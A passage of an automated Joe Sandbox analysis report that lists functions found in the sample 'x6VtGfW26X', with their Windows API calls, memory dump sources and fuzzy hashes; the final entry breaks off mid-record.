                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 3545744682-1032087821
                                                                                        • Opcode ID: f387dabec4e567c1a3862bb768b490af5c37f6f94a601b4735d7f769b5a314fb
                                                                                        • Instruction ID: b26b5792c5463b3dbbced2ccd638143c2694b83ae9745541b13238758ceb6fbe
                                                                                        • Opcode Fuzzy Hash: f387dabec4e567c1a3862bb768b490af5c37f6f94a601b4735d7f769b5a314fb
                                                                                        • Instruction Fuzzy Hash: 9B11C2B01483C5CFD7618B3598A1BFB7BE4AB8B354F15882DD0C9D7291CB394846DB52
                                                                                        Function 007B9D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 007B9E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d641a48738ea5f9fce196d381e75465df60307771e6af7fbf1b759e02fe4765e
                                                                                        • Instruction ID: b4e5c5234b2af48b8b0d7fc5d8b9188c42a305d32a2d92ac6ceb423b25fc656f
                                                                                        • Opcode Fuzzy Hash: d641a48738ea5f9fce196d381e75465df60307771e6af7fbf1b759e02fe4765e
                                                                                        • Instruction Fuzzy Hash: C3110475B442908FC7188F25D8816B9BFE1FB95321B19C4ACD591DB362C23CE846CBA4
                                                                                        Function 007ED880 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ff70e3b84d3dca673cc71a16646be916a2c98b6d2df5e6de1c40a157eee9732
                                                                                        • Instruction ID: 35694d1386ba823b5544b47434600ee278dd0d0b85ea4c5a7b2bace31ec125b6
                                                                                        • Opcode Fuzzy Hash: 8ff70e3b84d3dca673cc71a16646be916a2c98b6d2df5e6de1c40a157eee9732
                                                                                        • Instruction Fuzzy Hash: 26F0CD71119342EFD7202F26AC49B273778EF9A301F040C35F50191061EB39AC148671
                                                                                        Function 007DDE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: c18c25586cbee6cc9b185ceb4737c33c776552acde4cc97694ad2afb9deec8c4
                                                                                        • Instruction ID: d159c66201671fb31c49478ee836d67c32f6c82303a0bc184159606f24dc6b78
                                                                                        • Opcode Fuzzy Hash: c18c25586cbee6cc9b185ceb4737c33c776552acde4cc97694ad2afb9deec8c4
                                                                                        • Instruction Fuzzy Hash: 4DF0E275609702CFE301CF25C55871BBBF6BB88314F25891CE0A48B751C7B9AA898FC2
                                                                                        Function 007E16B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: 5515f8a8c00ba933f26f2783f82899bd470a657962077b9931c1aa5bd2b9b1b6
                                                                                        • Instruction ID: 03636a464839313249cec68935d5b6c086b07fe5f3fef1a2303abca4c2147484
                                                                                        • Opcode Fuzzy Hash: 5515f8a8c00ba933f26f2783f82899bd470a657962077b9931c1aa5bd2b9b1b6
                                                                                        • Instruction Fuzzy Hash: 09F0D4B06093028FE354DF68D5A871BBBE0EB88304F10881DE4958B390C7B99608CF82
                                                                                        Function 007B9CAE Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WS2_32(00000202), ref: 007B9CC6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Startup
                                                                                        • String ID:
                                                                                        • API String ID: 724789610-0
                                                                                        • Opcode ID: ddf6c17ade320005db91740fc1620be9af448aee267537b8d6069078d8a0beeb
                                                                                        • Instruction ID: 28b784cf90c89b1064ab75ecf0dbdfe9c54db67ac50d7b02184e7d611d3271a9
                                                                                        • Opcode Fuzzy Hash: ddf6c17ade320005db91740fc1620be9af448aee267537b8d6069078d8a0beeb
                                                                                        • Instruction Fuzzy Hash: 89C08C602D06609AF22C8329CC0ED3BBB6FAFC7F4DB00C00FD211063EBC5A00005CAA8
                                                                                        Function 007BC660 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 007BC674
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 0781d70bf2caf6d6c38d8ad58bc7f9f1094978369e70d557bda47ab4f0d976bb
                                                                                        • Instruction ID: 44ef0a9262d72e9f7438b2736712f58c08f0c1a76f076433d99a39fac77fd8db
                                                                                        • Opcode Fuzzy Hash: 0781d70bf2caf6d6c38d8ad58bc7f9f1094978369e70d557bda47ab4f0d976bb
                                                                                        • Instruction Fuzzy Hash: 87E0C222B91A4467D204AA18CC47F5A361A8382325F4CC3256650CA3C4E968A911C05E
                                                                                        Function 007BC69E Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 007BC6B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: 08770e5676961f5b2330716033ed7ea34e232506e6a1e248c70f51da731806ac
                                                                                        • Instruction ID: 3f7ffb9f68498d1cd6b6e830445aabde177df033121d7dad4f14bbc7033e6a78
                                                                                        • Opcode Fuzzy Hash: 08770e5676961f5b2330716033ed7ea34e232506e6a1e248c70f51da731806ac
                                                                                        • Instruction Fuzzy Hash: CAE05276BE530027F6384A18EC23F5423025395B21F38C218B310EE3C8C8ECA402820C
                                                                                        Function 007EBCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000,007ED8F6,?,?,?,00000000,007BB40D,00000000,00000000), ref: 007EBCCE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: f65304396adbc8ef661f14bc47c7f92cc5678abbedcd21cab855217f9997e5a2
                                                                                        • Instruction ID: 282d21947fe9bf9541d5550526a539dd4fe23b4e9fa9838cc23b6b6efe476d11
                                                                                        • Opcode Fuzzy Hash: f65304396adbc8ef661f14bc47c7f92cc5678abbedcd21cab855217f9997e5a2
                                                                                        • Instruction Fuzzy Hash: D6D01231405122EFC7101F14FC0AB963B55EF59320F074861F400AB171C669EC50DAD4
                                                                                        Function 007EBC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,007ED8EB), ref: 007EBCA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 48ad45757fe133e13a79d95bf73dacf7304bc981996519f97dcff679c8444193
                                                                                        • Instruction ID: e53c238d8c8b698f53fd03e5f3b55a2f60b3905ff55c7d06e30bca1f2b2d31cb
                                                                                        • Opcode Fuzzy Hash: 48ad45757fe133e13a79d95bf73dacf7304bc981996519f97dcff679c8444193
                                                                                        • Instruction Fuzzy Hash: E6C04831046120AACA602B15EC09B8A7B69AF99260F1245A2B004660B286A1AC829A94
                                                                                        Function 00809E5E Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 0080A0AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 0d2412a8c25eab6bdc4b5e9560feddb06f642e12010c11dbe3539e5e6ea47c7c
                                                                                        • Instruction ID: 8c590a8071aaa99406fa8b67b50053461c1f7942b77580e0ce916adbb6f6147b
                                                                                        • Opcode Fuzzy Hash: 0d2412a8c25eab6bdc4b5e9560feddb06f642e12010c11dbe3539e5e6ea47c7c
                                                                                        • Instruction Fuzzy Hash: DEF092B18086289FE3512F1488456BEFBF4FF14711F02082DDAE986681D2710840DB97
                                                                                        Function 008097C5 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 008097C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 36a12270ea89a58c17dc35061c87d3df26e17f1be0e81943499b7a80bed302ba
                                                                                        • Instruction ID: 1afd4d428c841a35691ebab78b7354dea73b9d2ab2cfa96b67b5e79985da62ea
                                                                                        • Opcode Fuzzy Hash: 36a12270ea89a58c17dc35061c87d3df26e17f1be0e81943499b7a80bed302ba
